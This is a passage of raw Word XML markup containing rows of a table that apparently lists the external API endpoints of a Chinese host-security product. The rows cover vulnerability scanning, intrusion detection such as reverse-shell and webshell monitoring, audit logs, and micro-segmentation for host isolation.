      <w:tr w:rsidR="00497C54" w14:paraId="55BD5BDB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="490CAB2E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>风险发现 - Windows弱密码</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="060FEDD0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Windows弱密码扫描及查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C22FFD5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>/external/api/vul/weakpwd/win</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="723A1C88" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C79B35A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>风险发现 - 安全补丁</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43E278E2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>补丁扫描及查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6244533C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>/external/api/vul/patch</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="67F6DCE4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A657149" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>风险发现 - Linux漏洞检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60B7DC4D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Linux漏洞扫描及查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="088B6D90" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>/external/api/vul/poc/linux</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6AE75A6C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0484FDC9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>风险发现 - 漏洞检测作业管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D08AB28" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Linux漏洞扫描作业管理及查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="509B2500" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>/external/api/vul/poc/job</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="23E0B9C2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4884D0E1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>入侵检测 - 暴力破解</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A4E1418" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>暴力破解封停/解封及数据查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="106593B8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>/external/api/detect/brutecrack</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="200C53C5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F431EFD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>入侵检测 - 异常登录</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D08D61B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>异常登录规则设置及数据查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="670AAFEF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>/external/api/detect/abnormallogin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="54BA3A6A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13F66E48" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>入侵检测 - 反弹shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FF17F18" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>反弹shell数据查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1EA5ABBD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>/external/api/detect/bounceshell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="098CA212" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="075FDCA9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>入侵检测 - 本地/容器内提权</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03A1054E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>本地提权数据查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="535546DE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>/external/api/detect/localrights</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="73AE75E3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="733243D5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>入侵检测 - 可疑操作</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A614487" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>可疑操作数据查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="308EDC84" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>/external/api/detect/shelllog</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1F9CC99D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06ED7FAD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>入侵检测 - 网络蜜罐</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6047CD36" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>网络蜜罐规则设置及数据查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D9887C1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>/external/api/detect/honeypot</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="765A9FBD" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CEF3EFC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>入侵检测 - Web后门</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6150372A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>web后门扫描及数据查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D613C7E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>/external/api/websecurity/webshell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7D3C15B0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DAEFA11" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>入侵检测 - Linux后门检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CBC20F1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Linux后门检测扫描及数据查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28486AF6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>/external/api/detect/backdoor/linux</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0CD49111" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0518F53B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>入侵检测 - Windows后门检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29848851" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Windows后门检测扫描及数据查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C6E4186" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>/external/api/detect/backdoor/win</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="339AFA96" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51CDF56B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>系统审计日志查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="654CE535" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>系统审计日志数据查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52020C34" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>/external/api/system/audit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7C86281B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B8C2235" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>快速任务</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A0943AA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>任务的建立、扫描及数据查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4075A6A0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>/external/api/fastjob</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4365669C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41BD87CC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>微隔离 - 主机一键隔离</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F0F7DD8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>查询一键隔离列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="305B8E0D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>GET /external/api/ms-srv/api/segmentation/list</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="70AF242F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="241E3901" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>微隔离 - 主机一键隔离</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="367D9608" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>查询隔离详情</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AF1935E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>GET /external/api/ms-srv/api/segmentation/detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="339FBA12" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A0C1145" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>微隔离 - 主机一键隔离</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BFF30A7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>创建隔离接口</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57FA2D11" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>POST /external/api/ms-srv/api/segmentation/create</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="18A256C3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11B216AA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>微隔离 - 主机一键隔离</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="781C2E3A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>修改隔离接口</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C26694B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>POST /external/api/ms-srv/api/segmentation/edit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5BAC0639" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26E73BB3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>微隔离 - 主机一键隔离</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FEA1919" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>解除隔离接口</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22D18A1C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>DELETE /external/api/ms-srv/api/segmentation/del</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="08B01AF5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71779F6E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>微隔离 - 主机一键隔离</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="152C404A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>删除隔离接口</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DAB1E23" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>DELETE /external/api/ms-srv/api/segmentation/realDel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="404D1B7A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6706CE3E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>微隔离 - 主机一键隔离</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B2304EE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>重试隔离接口</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5980E139" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>POST /external/api/ms-srv/api/segmentation/retry</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2667E11C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6923F401" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>微隔离 - 主机管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2354BEA7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>查询主机列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0522E2EA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>GET /external/api/ms-srv/api/hosts/list</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5B2247D9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A33A830" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>微隔离 - 主机管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AC84268" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>修改主机开关</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FA86B1E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>POST /external/api/ms-srv/api/hosts/ms-enable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6AE5BB55" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D2B2387" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>微隔离 - 拦截黑名单</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AFEC7C4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>查询黑名单策略列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B4255E2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>GET /external/api/ms-srv/api/black-strategy/list</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4C30531E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A508C04" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>微隔离 - 拦截黑名单</w:t>
            </w:r>
          </w:p>
        </w:tc>
